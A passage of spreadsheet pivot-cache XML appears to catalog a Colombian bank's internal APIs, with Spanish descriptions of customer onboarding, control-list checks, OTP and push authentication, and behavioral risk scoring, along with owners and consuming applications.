así­ mismo, es la encargada de controlar los reintentos en caso de falla."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-26T15:15:02"/>
    <s v="Customer Acquisition Data"/>
    <n v="100"/>
    <s v="Customer Acquisition Information NP"/>
    <n v="100"/>
    <x v="115"/>
    <s v="## **Descripción:** Es la API que habilita las capacidades para capturar los datos del cliente o potencial cliente Persona Natural, con el fin de obtener los datos necesarios para los procesos de conocimiento del cliente y dar cumplimiento a las exigencias normativas. En ese orden de ideas, el cliente o potencial cliente suministra sus datos personales, básicos, de contacto, económicos, tributarios y de moneda extranjera, los cuales también son necesarios para entender su contexto. Posteriormente, esta API contará con la capacidad de precargar información del cliente o potencial cliente a partir de fuentes internas y externas avalados por el banco, buscando minimizar la cantidad de información que debe diligenciar en los proceso de conocimiento del cliente. Premisas de la API Customer Acquisition Information NP: '¢Todos los campos de la captura de información son opcionales dentro del mapeo de datos de entrada de las operaciones (Exceptuando el Acquisition ID, el tipo y níºmero de documento), sin embargo, dependiendo del escenario del proceso de conocimiento del cliente que aplique, el Componente validará su obligatoriedad. '¢Adicionalmente, si una vez finalizada la captura de información, el cliente o potencial cliente desea modificar algíºn campo, se podrán realizar consumos posteriores a las operaciones para entregar la información a modificar. Sin embargo, se debe tener presente que la actualización de los campos usados en validaciones internas está sujeta a la parametrización del escenario que le aplique al cliente o potencial cliente. ## **Operaciones**  ###### **Capturar Información Personal** A través de esta operación el cliente o potencial cliente suministra sus datos personales al proceso de conocimiento del cliente, estos datos corresponden a los encontrados en el documento de identidad y datos de contacto básicos que permitirán habilitar, entre otros procesos, la validación de identidad. Premisas de Capturar Información Personal: - Los datos del documento de identidad serán de obligatorio diligenciamiento en los escenarios de vinculación donde no se realiza procesamiento del documento de identidad. - Para los escenarios de vinculación que requieren digitalización del documento de identidad, se ejecuta el diligenciamiento automático de los campos asociados al documento en esta operación y éstos serán visibles en el formato de conocimiento del cliente. - Los datos de contacto básicos corresponden al celular y correo electrónico asociados al tipo de dirección residencial, estos datos se validan contra el resto de las solicitudes de vinculación activas en el componente, en caso de estar asociados a otra solicitud (el mismo níºmero de celular y/o el mismo correo electrónico), se procede a generar una error para solicitar la modificación de los datos por sospecha de pitufeo, siempre y cuando se iguale o supere el parámetro Níºmero Máximo de Solicitudes Activas con un mismo correo electrónico y/o níºmero de celular. ###### **Capturar Información Básica** A través de esta operación,  el cliente o potencial cliente suministra sus datos básicos para los procesos de conocimiento del cliente, éstos corresponden a información sociodemográfica y algunos datos del documento de identidad. ###### **Capturar Información de Contacto** A través de esta operación el cliente o potencial cliente suministra sus datos de contacto para llevar a cabo los procesos de conocimiento del cliente que apliquen. Premisas de Capturar Información de Contacto: - La operación permite el ingreso de dos tipos de dirección: residencial o laboral.  - Un cliente o  potencial cliente solo podrá tener una dirección de cada tipo y solo una podrá estar marcada como dirección de correspondencia.  - El celular y correo electrónico asociados a la dirección residencial serán los que se ingresen en la operación Capturar Datos Personales y no se permitirá su modificación al hacer el llamado a la operación Capturar datos contacto. ###### **Capturar Información Económica** A través de esta operación el cliente o potencial cliente suministra sus datos económicos para llevar a cabo los procesos de conocimiento del cliente que apliquen. Tanto en esta operación como en Capturar Información Tributaria algunos campos cambiarán su obligatoriedad de acuerdo a la ocupación que ingrese el cliente o potencial cliente, este comportamiento es parametrizable para cada escenario. ###### **Capturar Información Tributaria** A través de esta operación el cliente o potencial cliente suministra sus datos tributarios y otros datos requeridos por normatividad SARLAFT para llevar a cabo los procesos de conocimiento del cliente que apliquen. Premisas de Capturar Información Tributaria - En esta operación se diligencia la información para la autocertificación fiscal de FATCA y CRS, la operación está en capacidad de recibir la autocerficacion tanto de FATCA como de CRS en dos preguntas independientes, sin embargo inicialmente se integraron en una sola pregunta que aborda ambas normativas y se expone en el formato F-2486, de acuerdo a la respuesta de esta pregunta el cliente o potencial cliente podrá relacionar la lista de paí­ses y sus IDs tributarios correspondientes. - La obligatoriedad de los campos paí­s y ID tributario dependerá de la respuesta dada por el cliente o potencial cliente a la pregunta de tributa o no como residente o ciudadano en los Estados Unidos o en otros paí­ses diferentes a Colombia. - Tanto en esta operación como en Capturar Información Económica algunos campos cambiarán su obligatoriedad de acuerdo a la ocupación que ingrese el cliente o potencial cliente, este comportamiento es parametrizable para cada escenario. ###### **Capturar Información de Moneda Extranjera** A través de esta operación el cliente o potencial cliente suministra sus datos de moneda extranjera para llevar a cabo los procesos de conocimiento del cliente que apliquen. Premisas de Capturar Información de Moneda Extranjera: - Si el cliente o potencial cliente realiza operaciones en moneda extranjera, deberá relacionar de forma obligatorio el detalle de sus operaciones y productos.  - La operación solo admite un registro por cada tipo de transacción indicada."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-04T11:00:23"/>
    <s v="Customer Acquisition"/>
    <n v="110"/>
    <s v="Customer Acquisition Management"/>
    <n v="110"/>
    <x v="116"/>
    <s v="## **Descripción:** Es la API principal del proceso de vinculación de clientes pues corresponde al punto de entrada a una nueva vinculación. Habilita las capacidades para iniciar un proceso de vinculación, verificar su estado, consultar cuáles son las instrucciones y cláusulas y su aceptación/declinación.  Todo proceso de vinculación debe obligatoriamente iniciar por esta API, la cual proporciona un ID íºnico de vinculación que será necesario para consumir las demás APIs requeridas en el proceso y de esta manera llevar el control y la trazabilidad de éste. ## **Operaciones**  ###### **Iniciar vinculación:** A través de esta operación se da inicio a una nueva solicitud de vinculación; se recibe por parte de los canales/consumidores un set de parámetros que permiten perfilar el tipo de vinculación que se debe realizar, es decir, le permite al Componente Transversal de Vinculación identificar las actividades que deben ser completadas para vincular correctamente a un potencial cliente.  La operación Iniciar Vinculación, retorna el Id íºnico de vinculación el cual permite llevar el control y trazabilidad del proceso, un potencial cliente puede tener varias solicitudes de vinculación activas, cada una con diferente Id, siempre y cuando el producto, canal o lí­nea de negocio sean diferentes. Premisas de Iniciar Vinculación:  - Si un potencial cliente tiene varias solicitudes activas, cuando una de ellas finalice exitosamente, las otras se marcarán automáticamente como canceladas.  - Si un potencial cliente inicia una vinculación y ya tiene una activa con el mismo producto, canal o lí­nea de negocio, el Componente no permitirá crearla de forma exitosa, en su lugar, retornará una excepción de negocio alertando sobre esta situación y brindandole al potencial cliente la opción de retoma o la opción de esperar a que ésta se cancele automáticamente por vigencia.  - Una solicitud de vinculación tendrá una vigencia de 24 horas (tiempo parametrizable a nivel funcional con previa validación y aprobación del área Jurí­dica, de Seguridad y Cumplimiento), contadas a partir de la fecha y hora de creación de la misma, cumplido este tiempo, si la vinculación aun se encuentra activa, se marcará automáticamente como 'Cancelada por vigencia'?. ###### **Consultar instrucciones y cláusulas:** A través de esta operación, es posible indicarle al consumidor cuáles son los documentos requeridos y cláusulas para el proceso de vinculación, dependiendo del escenario de vinculación pueden presentarse variaciones en las instrucciones y cláusulas a presentar. ###### **Aceptar cláusulas:** A través de esta operación se proporciona un mecanismo de aceptación de cláusulas al proceso de vinculación iniciado; es posible recibir dos respuestas, SI (Aceptación de cláusulas) o NO (No aceptación de cláusulas). ###### **Consultar estado de la solicitud:** A través de esta operación es posible conocer el estado actual de una solicitud de vinculación y de todas sus actividades/steps/operaciones. Premisas de la Operación Consultar estado de la solicitud: Una solicitud de vinculación puede tener los siguientes estados:   **Activo:**  Estado de la solicitud cuando tiene actividades pendientes por completar.  **Cancelado:**  Estado de la solicitud que se asigna  cuando ésta se interrumpe en alguna etapa del proceso, puede darse por cualquiera de las siguientes causales:   - El potencial cliente no acepta cláusulas.   - El potencial cliente no superó exitosamente las validaciones del proceso (Listas de control, validación de identidad, calificación de riesgo LAFT, etc.) o se presentaron fallas en el reuso de servicios.   - Hubo otra solicitud de vinculación con variables de entrada diferentes que finalizó correctamente. (Producto, canal, lí­nea de negocio  **Finalizado:** Estado de la solicitud que se asigna cuando se han completado todas las actividades parametrizadas en el escenario de vinculación correctamente.   Las solicitudes que ingresan al Componente y se perfilan como 'Actualizar cliente'? o 'Apertura de Producto'?, también quedan en estado Finalizado.  **Cancelado por vigencia:** Estado de la solicitud que se asigna cuando han pasado 24 horas a partir de la creación de la solicitud y ésta aun se encontraba activa. Esta es una directriz desde seguridad y es un valor parametrizable.  **Pendiente marcación:** Estado de la solicitud que se asigna cuando al realizar la calificación de riesgo LAFT ésta indica que el potencial cliente no es apto para continuar con el proceso de vinculación, se deja en este estado para asegurar que se consuma la operación Marcar Cliente en Listas de Control, evitando así­ que el potencial cliente cree una nueva solicitud y modifique los datos de entrada que dieron lugar a la calificación no apta.  **Pendiente publicación:** Estado de la solicitud que se asigna cuando falla la publicación en Oracle de los documentos soporte de la vinculación y es el mecanismo que permite identificar las solicitudes a incluir en el proceso batch de reintentos de publicación.  **Pendiente notificación:** Estado de la solicitud que se asigna cuando falla el enví­o de la notificación al cliente  ví­a email con el formato de conocimiento adjunto y se requiere para monitoreo y gestiones posteriores desde la operación. Una actividad/paso/step/operación puede tener los siguientes estados:   **Pendiente:** Estado que indica que la actividad/operación/paso está en proceso o no ha sido iniciada.  **Completado:** Estado que indica que la actividad/operación/paso ha sido finalizada de manera exitosa.  **Rechazado:** Estado que indica que el potencial cliente no superó exitosamente las validaciones de la actividad/operación/paso.  **Escalado:** Estado exclusivo para la etapa de validación de identidad, con este estado se indica que el potencial cliente no finalizó exitosamente la primera etapa y se escala a una segunda etapa para validad su identidad con preguntas reto.  **Bloqueado:** Estado exclusivo para las operaciones de generar y validar token cuando se superaron los intentos permitidos para la generación y envió del OTP o su validación. Se bloquea temporalmente las operaciones por directriz de seguridad.   **Completado Automáticamente:** Estado que se aplica a las operaciones de generar  y validar preguntas reto, cuando el potencial cliente supera satisfactoriamente la validación de identidad en la etapa 1.  O en la operación de cargar documento cuando de acuerdo a la ocupación del potencial cliente no requiere aportar el RUT como documento soporte.   **Completado Parcialmente:** Estado para indicar avance de operaciones/actividades que se deben consumir en varios momentos del proceso.  Aceptar clausulas: Se marca en este estado cuando se acepta una de las cláusulas y aun quedan clausulas pendientes por aceptar.  Cargar documentos: Se marca en este estado cuando se procesa exitosamente el primer documento soporte de la vinculación.  **Diligenciar Manualmente:** Estado exclusivo para la etapa del cargue de documento de identidad e indica que kofax procesó parcialmente el documento, se requiere que el cliente diligencie manualmente algunos de los campos del documento para continuar."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <n v="1"/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-04T11:00:23"/>
    <s v="Customer Acquisition"/>
    <n v="110"/>
    <s v="Customer Acquisition Profiling"/>
    <n v="110"/>
    <x v="117"/>
    <s v="## **Descripción:** La API Customer Acquisition Profiling habilita las capacidades para perfilar al cliente desde el punto de vista de negocio, identificando el proceso que le aplica:  Actualización, Vinculación o Apertura de producto cuando no requiere ninguna gestión de Conocimiento del Cliente. Así­ mismo identifica si el potencial cliente a vincular es exclusivo de BALM a partir del segmento registrado en los maestros de clientes. Esta API también permite realizar la segmentación comercial del potencial cliente. ## **Operaciones**  ###### **Perfilar Cliente:** Permite realizar la perfilación de negocio al potencial cliente, con el objetivo de identificar cuál es la acción a seguir en el proceso.  Las acciones a seguir pueden ser las siguientes:   * Vincular Prospecto  * Vincular prospecto - Exclusivo BALM  * Actualizar Cliente  * Apertura Producto, en caso de que no requiera gestiones de conocimiento del cliente. Esta operación hace uso de los servicio de MDM Consulta Básica de Clientes y Datos de Gestión Comercial. ###### **Segmentar Cliente:** Permite realizar la segmentación comercial al potencial cliente, la cual se determinará de acuerdo con sus diferentes variables financieras, económicas, etc. retornando el segmento al cual quedó asignado.  El segmento es un dato necesario para registrar al potencial cliente en el maestro de clientes. Actualmente esta operación permite ejecutar la calificación de riesgo LAFT, para identificar si el potencial cliente es apto o no para continuar con el proceso de vinculación. Esta operación hace uso del servicio Gestionar Prospectos de SAP CRM para realizar el primer registro/modificación del potencial cliente en el sistema. Para hacer uso de esta capacidad es necesario que previamente se hayan capturado los datos del potencial cliente: Personales, básicos, de contacto, económicos, tributarios y de moneda extranjera."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-26T14:51:25"/>
    <s v="Customer Acquisition Security"/>
    <n v="100"/>
    <s v="Customer Acquisition Validation"/>
    <n v="100"/>
    <x v="118"/>
    <s v="## **Descripción:** Es la API que habilita las capacidades para ejecutar las validaciones requeridas para adelantar los procesos de conocimiento del cliente dando cumplimiento a la normatividad SARLAFT, aportando a la reducción de riesgos en los procesos, además de dar cumplimiento a los lineamientos del modelo de firma electrónica acogido el Banco. Posteriormente, en este producto de APIs se incorporará la capacidad para validar la consistencia del representante legal de un cliente o potencial cliente Persona Jurí­dica, además la calificación de riesgo LAFT a través de SCOVIC. Premisas de la API Customer Acquisition Validation: * La validación en listas de control es obligatoria para los escenarios de vinculación parametrizados en el Componente de Vinculación, para ello se realizan dos consultas en los reportes de listas, una por tipo y níºmero de documento y otra por nombre completo. Es importante tener presente que inicialmente el Componente no admitirá la vinculación para potenciales clientes que figuren con alerta o bloqueo en listas de control, estas solicitudes se cancelan automáticamente. * La marcación de clientes NO objetivo inicialmente se aplica para potenciales clientes que no sean aptos para continuar el proceso de vinculación debido a su calificación de riesgo LAFT, esta operación es obligatoria para todos los escenarios que estén parametrizados en el Componente. * La generación y validación de token es de caracter obligatorio para todos los procesos de conocimiento del cliente que exijan firma electrónico en los formatos generado durante la experiencia. ## **Operaciones**  ###### **Validar Listas de Control** A través de esta operación es posible identificar si el potencial cliente o representante legal, se encuentra reportado en alguna categorí­a de listas de control, haciendo uso del servicio Check Control List/Servicio de Listas de Control. El resultado de la validación puede tener los siguientes valores: * El potencial cliente no se encuentra reportado en listas de control.  * El potencial cliente se encuentra reportado en listas de control en categorí­a de alertas.  * El potencial cliente se encuentra reportado en listas de control en categorí­a de bloqueos. Premisas de Validar Listas de Control: - Es una operación de consumo obligatorio en los escenarios parametrizados en el Componente. - Esta operación se debe consumir después de capturar el nombre completo del cliente, preferiblemente desde el documento de identidad, es decir, se debe ejecutar posterior a la operación Cargar documentos con el documento de identidad. - En la respuesta entregada al consumidor se detalla, en caso de encontrar al potencial cliente reportado en listas de control, si corresponde a alerta o bloqueo y la categorí­a en la cual se encuentra marcado. **Esta información es de caracter confidencial y por ningíºn motivo se debe entregar al cliente o potencial cliente.** ###### **Marcar Cliente No Objetivo** A través de esta operación, se valida si el cliente o potencial cliente debe ser marcado en listas de control por novedades asociadas a la detección de clientes no objetivo para el Banco, ésta es de consumo obligatorio para cualquier escenario de vinculación parametrizado en el Componente. Un cliente o potencial cliente identificado como &quot;no objetivo&quot; es aquel que presenta comportamientos atí­picos o inconsistencias en la información suministrada durante el proceso de conocimiento del cliente. Esta operación hace uso de una API externa al Componente denominada Control List Management. Inicialmente esta marcación se aplicará sobre aquellos potenciales clientes cuya calificación SARLAFT no es apta para llevar a cabo el proceso de vinculación a través del Componente, de esta manera garantizamos que el potencial cliente no pueda crear una nueva solicitud modificando los datos y que los equipos comerciales identifiquen los potenciales clientes que iniciaron un proceso de vinculación por el Componente y requieren mayor debida diligencia.  Posteriormente, se espera que cuando falle la verificación de identidad, se detecte la entrega de información fraudulenta, o desde fuentes externas se identifique que el potencial cliente es fraudulento, se espera marcarlo en una lista de control como cliente no objetivo y no se permitirá continuar con el proceso de conocimiento del cliente. ###### **Generar Token** A través de esta operación es posible generar un código o token para validar al potencial cliente mediante el mecanismo OTP (One-Time Password). Inicialmente, esta operación será usada para firmar electrónicamente el Formato de Conocimiento del Cliente. Esta operación hace uso de una API externa al Componente denominada Token - Management. Premisas de Generar Token: - El token es enviado al correo electrónico y ví­a SMS al celular entregados por el potencial cliente. - Previo a la generación del token, el Componente valida que el cliente o potencial cliente tenga una solicitud  activa.   - Si no se especifica un correo o níºmero de celular en la entrada de la operación, el Componente valida si previamente ya se han capturado estos datos en algíºn paso anterior en el proceso de conocimiento del cliente, en caso de no encontrar datos se lanza un error  indicando que no se ha especificado un correo o níºmero de celular para el enví­o del token. Tienen prioridad los datos ingresados previamente a través del Producto Customer Acquisition Data. - Por restricciones a nivel de seguridad, esta operación cuenta con un níºmero máximo de intentos parametrizados, una vez el cliente o potencial cliente supere el níºmero de intentos, se genera un bloqueo que impide la generación del token durante un tiempo parametrizable. - Es posible parametrizar las actividades/operaciones prerrequisito para el consumo de la operación Generar Token en los diferentes escenario de conocimiento del cliente parametrizados en el Componente.   ###### **Validar Token** A través de esta operación es posible comprobar si el token ingresado por el cliente o potencial cliente es válido, verificando su existencia y vigencia.  Una vez se compruebe la validez del token, es posible afirmar que el potencial cliente ha tenido una validación exitosa. Esta operación hace uso de una API externa al Componente denominada Token - Management. Premisas de Validar Token: - El cliente o potencial cliente debe ingresar durante la experiencia, el token enviado al correo electrónico y ví­a SMS al celular que suministró previamente. - Previo a la validación del token, el Componente valida que el cliente o potencial cliente tenga una solicitud  activa.   - Por restricciones a nivel de seguridad, esta operación cuenta con un níºmero máximo de intentos parametrizados, una vez el cliente o potencial cliente supere el níºmero de intentos, se genera un bloqueo que impide la validación del token durante un tiempo parametrizable. - Es posible parametrizar las actividades/operaciones prerrequisito para el consumo de la operación Validar Token en los diferentes escenario de conocimiento del cliente parametrizados en el Componente. Es obligatorio ejecutar la operación Generar Token previo a la validación del mismo."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-07-04T22:03:28"/>
    <s v="Customer Authentication"/>
    <n v="104"/>
    <s v="Customer Authentication - OTP"/>
    <n v="102"/>
    <x v="119"/>
    <s v="El api de OTP, que dentro del ecosistema pertenece al área de seguridad.  Para la autenticación fuerte en los canales virtuales se utiliza OTP que es la clave dinámica, que permite generar un segundo factor de autenticación para tener más seguridad en las transacciones.  Los canales que consuman esta API deben enviar un Sharedkey que generalmente está compuesto por: tipo de documento, numero de documento y canal, aunque cada canal tiene autonomí­a sobre esta generación; esto sirve para identificar al cliente de manera íºnica en detect ID, que es la plataforma que genera la clave dinámica, la clave dinámica es un níºmero llamado OTP técnicamente.  Para autenticar el OTP se debe tener en cuenta si este fue generado por softoken o por ODA que es SMS o email, para poderlo autenticar adecuadamente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <s v="EnrolarClienteOTP/V2.0, _x000a_AutenticarClienteOTP/V2.0_x000a_GenerarOTP/V2.0"/>
    <s v="Cyxtera"/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ PEP_AW1128"/>
    <n v="94742"/>
    <n v="103735"/>
    <n v="96125"/>
    <n v="105138"/>
    <n v="120505"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-09-07T14:47:33"/>
    <s v="Customer Authentication"/>
    <n v="101"/>
    <s v="Customer Authentication - OTP"/>
    <n v="101"/>
    <x v="119"/>
    <s v="El api de OTP, que dentro del ecosistema pertenece al área de seguridad.  Para la autenticación fuerte en los canales virtuales se utiliza OTP que es la clave dinámica, que permite generar un segundo factor de autenticación para tener más seguridad en las transacciones.  Los canales que consuman esta API deben enviar un Sharedkey que generalmente está compuesto por: tipo de documento, numero de documento y canal, aunque cada canal tiene autonomí­a sobre esta generación; esto sirve para identificar al cliente de manera íºnica en detect ID, que es la plataforma que genera la clave dinámica, la clave dinámica es un níºmero llamado OTP técnicamente.  Para autenticar el OTP se debe tener en cuenta si este fue generado por softoken o por ODA que es SMS o email, para poderlo autenticar adecuadamente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="EASYHOME_NU0004001"/>
    <n v="94742"/>
    <n v="103735"/>
    <n v="96125"/>
    <n v="105138"/>
    <n v="120505"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-02-25T16:45:22"/>
    <s v="Customer Authentication"/>
    <n v="200"/>
    <s v="Customer Authentication - Otp"/>
    <n v="200"/>
    <x v="119"/>
    <s v="El api de OTP, que dentro del ecosistema pertenece al área de seguridad.  Para la autenticación fuerte en los canales virtuales se utiliza OTP que es la clave dinámica, que permite generar un segundo factor de autenticación para tener más seguridad en las transacciones.  Los canales que consuman esta API deben enviar un Sharedkey que generalmente está compuesto por: tipo de documento, numero de documento y canal, aunque cada canal tiene autonomí­a sobre esta generación; esto sirve para identificar al cliente de manera íºnica en detect ID, que es la plataforma que genera la clave dinámica, la clave dinámica es un níºmero llamado OTP técnicamente.  Para autenticar el OTP se debe tener en cuenta si este fue generado por softoken o por ODA que es SMS o email, para poderlo autenticar adecuadamente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ DELFINWEB_AW0748001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PEP_AW1128"/>
    <n v="94742"/>
    <n v="103735"/>
    <n v="96125"/>
    <n v="105138"/>
    <n v="120505"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-07-25T23:05:23"/>
    <s v="Customer Authentication"/>
    <n v="100"/>
    <s v="Customer Authentication - OTP"/>
    <n v="100"/>
    <x v="119"/>
    <s v="El api de OTP, que dentro del ecosistema pertenece al área de seguridad.  Para la autenticación fuerte en los canales virtuales se utiliza OTP que es la clave dinámica, que permite generar un segundo factor de autenticación para tener más seguridad en las transacciones.  Los canales que consuman esta API deben enviar un Sharedkey que generalmente está compuesto por: tipo de documento, numero de documento y canal, aunque cada canal tiene autonomí­a sobre esta generación; esto sirve para identificar al cliente de manera íºnica en detect ID, que es la plataforma que genera la clave dinámica, la clave dinámica es un níºmero llamado OTP técnicamente.  Para autenticar el OTP se debe tener en cuenta si este fue generado por softoken o por ODA que es SMS o email, para poderlo autenticar adecuadamente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <s v="EnrolarClienteOTP/V2.0_x000a_AutenticarClienteOTP/V2.0_x000a_GenerarOTP/V2.0_x000a_"/>
    <m/>
    <s v="No tiene"/>
    <n v="94742"/>
    <n v="103735"/>
    <n v="96125"/>
    <n v="105138"/>
    <n v="120505"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-12-04T03:13:45"/>
    <s v="Customer Authentication"/>
    <n v="104"/>
    <s v="Customer Authentication - Otp Management"/>
    <n v="100"/>
    <x v="120"/>
    <s v="Permite la gestión y administración con tres capacidades en relación a la clave dinámica.  1._x0009_Consultar la información completa de bloqueo global sobre un cliente identificado por sharedKey.  2._x0009_Bloqueo de un cliente identificado por sharedKey. 3._x0009_Desbloqueo de un cliente identificado por sharedKey."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ PEP_AW1128"/>
    <n v="19"/>
    <n v="2"/>
    <n v="3"/>
    <n v="1973"/>
    <n v="20228"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-02-25T16:45:22"/>
    <s v="Customer Authentication"/>
    <n v="200"/>
    <s v="Customer Authentication - Otp Management"/>
    <n v="101"/>
    <x v="120"/>
    <s v="Permite la gestión y administración con tres capacidades en relación a la clave dinámica.  1._x0009_Consultar la información completa de bloqueo global sobre un cliente identificado por sharedKey.  2._x0009_Bloqueo de un cliente identificado por sharedKey. 3._x0009_Desbloqueo de un cliente identificado por sharedKey."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <s v=""/>
    <m/>
    <s v="Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ DELFINWEB_AW0748001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PEP_AW1128"/>
    <n v="19"/>
    <n v="2"/>
    <n v="3"/>
    <n v="1973"/>
    <n v="20228"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-08-14T17:18:42"/>
    <s v="Customer Authentication"/>
    <n v="104"/>
    <s v="Customer Authentication - push messages"/>
    <n v="100"/>
    <x v="121"/>
    <s v="Este servicio permitirá la implementación del segundo factor de autenticaciones Push, que evita que el cliente deba diligenciar un código en cualquier interfaz, sino que va a poder autenticar si compra en un celular en primer contacto aceptando a declinando en el primero contacto de mensaje a su celular.  El servicio expone los métodos necesarios para generar notificaciones Push, enviados al dispositivo móvil registrado por un cliente, para aprobar o rechazar Información de la transacción."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ PEP_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-02-25T16:45:22"/>
    <s v="Customer Authentication"/>
    <n v="200"/>
    <s v="Customer Authentication - Push Messages"/>
    <n v="200"/>
    <x v="122"/>
    <s v="Este servicio permitirá la implementación del segundo factor de autenticaciones Push, que evita que el cliente deba diligenciar un código en cualquier interfaz, sino que va a poder autenticar si compra en un celular en primer contacto aceptando a declinando en el primero contacto de mensaje a su celular.  El servicio expone los métodos necesarios para generar notificaciones Push, enviados al dispositivo móvil registrado por un cliente, para aprobar o rechazar Información de la transacción."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ DELFINWEB_AW0748001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PEP_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-09-13T02:57:24"/>
    <s v="Customer Behavioral Models"/>
    <n v="101"/>
    <s v="Customer Behavioral Models - Behavioral"/>
    <n v="100"/>
    <x v="123"/>
    <s v="El API de se encargará de calcular el score (calificación) de comportamiento de un cliente, lo cual se determina por medio de un nivel de riesgo, teniendo como dominio de valores G8 siendo está la calificación más alta de riesgo, dando a entender que esto implica un riesgo para el banco, hasta G1 siendo la calificación más baja, dando a entender que esto implica un riesgo bajo para el banco.  La G de comportamiento en conjunto con otros conceptos entregan un riesgo consolidado para dar una decisión de aprobado o no en los productos del grupo Bancolombia que el cliente este solicitando."/>
